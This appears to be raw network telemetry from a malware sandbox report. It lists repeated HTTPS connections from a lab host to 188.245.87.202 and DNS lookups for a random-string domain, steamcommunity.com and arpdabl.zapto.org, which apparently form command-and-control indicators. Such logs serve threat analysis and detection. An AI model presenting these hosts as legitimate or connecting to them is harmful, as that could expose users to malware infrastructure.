                                                                        Aug 5, 2024 18:56:18.067787886 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.067800999 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.067816973 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.067835093 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.082506895 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.082601070 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.082622051 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.082679033 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.084326982 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.084367990 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.084395885 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.084404945 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.084428072 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.084450006 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.086174011 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.086215973 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.086253881 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.086261988 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.086287975 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.086307049 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.186408997 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.186456919 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.186501026 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.186521053 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.186544895 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.186559916 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.188055038 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.188097954 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.188132048 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.188137054 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.188162088 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.188182116 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.190800905 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.190841913 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.190874100 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.190879107 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.190906048 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.190927029 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.191819906 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.191859007 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.191888094 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.191893101 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.191917896 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.191937923 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.193434954 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.193459034 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.193521976 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.193527937 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.193568945 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.195264101 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.195278883 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.195338964 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.195349932 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.195383072 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.196645975 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.196664095 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.196712017 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.196716070 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.196748972 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.196767092 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.197664022 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.197681904 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.197726965 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.197731018 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.197758913 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.197779894 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.267309904 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.267334938 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.267400980 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.267411947 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.267456055 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.267488003 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.267963886 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.267983913 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.268043041 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.268048048 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.268076897 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.269653082 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.269848108 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.269897938 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.269926071 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.269929886 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.269973040 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.270731926 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.270750046 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.270814896 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.270819902 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.270863056 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.273941994 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.273966074 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.274024963 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.274030924 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.274072886 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.275551081 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.275576115 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.275654078 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.275659084 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.275691986 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.276163101 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.276184082 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.276225090 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.276230097 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.276258945 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.276278019 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.278325081 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.278350115 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.278409004 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.278414965 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.278470993 CEST49729443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:18.350028992 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:18.350058079 CEST44349729188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:40.055207014 CEST49739443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:40.055222988 CEST44349739188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:40.331938982 CEST44349740188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:40.332123995 CEST49740443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:40.332503080 CEST49740443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:40.332530975 CEST44349740188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:40.334140062 CEST49740443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:40.334152937 CEST44349740188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:40.334218025 CEST49740443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:40.334276915 CEST44349740188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:40.637630939 CEST49741443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:40.637703896 CEST44349741188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:40.637798071 CEST49741443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:40.642748117 CEST49741443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:40.642765999 CEST44349741188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:41.164371967 CEST44349740188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:41.164457083 CEST44349740188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:41.164508104 CEST49740443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:41.164644003 CEST49740443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:41.165410042 CEST49740443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:41.165452003 CEST44349740188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:41.322283030 CEST44349741188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:41.322529078 CEST49741443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:41.322889090 CEST49741443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:41.322917938 CEST44349741188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:41.330014944 CEST49741443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:41.330035925 CEST44349741188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:41.330106974 CEST49741443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:41.330143929 CEST44349741188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:41.657440901 CEST49742443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:41.657505989 CEST44349742188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:41.657597065 CEST49742443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:41.657828093 CEST49742443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:41.657860994 CEST44349742188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:42.166454077 CEST44349741188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:42.166542053 CEST44349741188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:42.166559935 CEST49741443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:42.166595936 CEST49741443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:42.167707920 CEST49741443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:42.167726994 CEST44349741188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:42.427551031 CEST44349742188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:42.427736998 CEST49742443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:42.428231955 CEST49742443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:42.428260088 CEST44349742188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:42.429910898 CEST49742443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:42.429924965 CEST44349742188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:42.429964066 CEST49742443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:42.429980993 CEST44349742188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:42.656934023 CEST49743443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:42.656980038 CEST44349743188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:42.657048941 CEST49743443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:42.657279968 CEST49743443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:42.657289982 CEST44349743188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:43.265144110 CEST44349742188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:43.265206099 CEST44349742188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:43.265341043 CEST49742443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:43.265341043 CEST49742443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:43.266257048 CEST49742443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:43.266282082 CEST44349742188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:43.444308043 CEST44349743188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:43.444403887 CEST49743443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:43.444895983 CEST49743443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:43.444916010 CEST44349743188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:43.446738005 CEST49743443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:43.446738958 CEST49743443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:43.446758032 CEST44349743188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:43.446788073 CEST44349743188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:43.655267954 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:43.655322075 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:43.655390978 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:43.655649900 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:43.655668020 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.149229050 CEST44349743188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.149328947 CEST44349743188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.149420023 CEST49743443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.149420023 CEST49743443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.150546074 CEST49743443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.150562048 CEST44349743188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.328620911 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.328736067 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.329508066 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.329535961 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.331268072 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.331280947 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.331382990 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.331401110 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.703485966 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.703528881 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:44.703604937 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.703831911 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:44.703844070 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.148808002 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.148869038 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.148896933 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.148927927 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.149811983 CEST49744443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.149837017 CEST44349744188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.398824930 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.398883104 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.399364948 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.399372101 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.400974035 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.400978088 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.401006937 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.401011944 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.705627918 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.705656052 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:45.705722094 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.705940008 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:45.705951929 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.135731936 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.135787010 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.135799885 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.135833979 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.135838985 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.135871887 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.143132925 CEST49745443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.143151045 CEST44349745188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.372724056 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.372824907 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.373405933 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.373413086 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.374993086 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.374998093 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.375046968 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.375055075 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.793608904 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.793673992 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:46.793765068 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.793977976 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:46.793991089 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.236643076 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.236717939 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.236845016 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.237742901 CEST49746443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.237762928 CEST44349746188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.466634989 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.466732025 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.467178106 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.467191935 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.468734026 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.468740940 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.468769073 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.468776941 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.824681997 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.824727058 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:47.824819088 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.825072050 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:47.825082064 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.217108965 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.217235088 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.217258930 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.217319965 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.218278885 CEST49747443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.218321085 CEST44349747188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.654922962 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.655005932 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.655473948 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.655494928 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.657234907 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.657247066 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.657268047 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.657279015 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.880496025 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.880559921 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:48.880661011 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.880901098 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:48.880918026 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:49.380557060 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:49.380614042 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:49.380712986 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:49.382103920 CEST49748443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:49.382124901 CEST44349748188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:49.549258947 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:49.549343109 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:49.549793959 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:49.549810886 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:49.552366972 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:49.552376032 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:50.085031986 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:50.085146904 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:50.085201979 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:50.085239887 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:50.085268021 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:50.085297108 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:50.086345911 CEST49749443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:50.086380959 CEST44349749188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:50.885107994 CEST49750443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:50.885224104 CEST44349750188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:50.885335922 CEST49750443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:50.885607958 CEST49750443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:50.885639906 CEST44349750188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:51.562750101 CEST44349750188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:51.563056946 CEST49750443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:51.563540936 CEST49750443192.168.2.5188.245.87.202
                                                                        Aug 5, 2024 18:56:51.563570976 CEST44349750188.245.87.202192.168.2.5
                                                                        Aug 5, 2024 18:56:51.565283060 CEST49750443192.168.2.5188.245.87.202
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 5, 2024 18:55:00.994283915 CEST | 63005 | 53 | 192.168.2.5 | 1.1.1.1
Aug 5, 2024 18:55:01.009685993 CEST | 53 | 63005 | 1.1.1.1 | 192.168.2.5
Aug 5, 2024 18:55:48.996161938 CEST | 58488 | 53 | 192.168.2.5 | 1.1.1.1
Aug 5, 2024 18:55:49.003500938 CEST | 53 | 58488 | 1.1.1.1 | 192.168.2.5
Aug 5, 2024 18:56:53.672638893 CEST | 58768 | 53 | 192.168.2.5 | 1.1.1.1
Aug 5, 2024 18:56:53.684981108 CEST | 53 | 58768 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 5, 2024 18:55:00.994283915 CEST | 192.168.2.5 | 1.1.1.1 | 0x225a | Standard query (0) | KLUpntqKswLWgWJpHbymfJYffqy.KLUpntqKswLWgWJpHbymfJYffqy | A (IP address) | IN (0x0001) | false
Aug 5, 2024 18:55:48.996161938 CEST | 192.168.2.5 | 1.1.1.1 | 0x36a8 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Aug 5, 2024 18:56:53.672638893 CEST | 192.168.2.5 | 1.1.1.1 | 0x6302 | Standard query (0) | arpdabl.zapto.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
